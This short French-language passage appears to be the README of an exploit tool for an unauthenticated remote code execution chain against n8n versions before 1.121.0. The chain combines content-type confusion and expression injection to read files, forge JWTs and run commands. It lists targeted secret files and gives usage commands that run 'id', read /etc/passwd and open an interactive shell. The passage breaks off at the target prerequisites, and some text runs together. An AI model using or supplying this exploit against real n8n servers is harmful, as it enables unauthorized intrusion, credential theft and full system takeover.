
Chaîne d'exploitation pour l'exécution de code à distance non authentifiée dans n8n, combinant la confusion de type de contenu et l'injection d'expressions pour lire des fichiers, forger des JWT et exécuter des commandes.
Chaîne RCE non authentifiée pour n8n < 1.121.0 (CVSS 10.0)
/home/node/.n8n/config et database.sqlitechild_process# Exécuter une commande
python3 exploit.py http://target:5678 /form/test --cmd "id"
# Lire un fichier
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# Shell interactif
python3 exploit.py http://target:5678 /form/test
La cible doit disposer d'un workflow actif avec :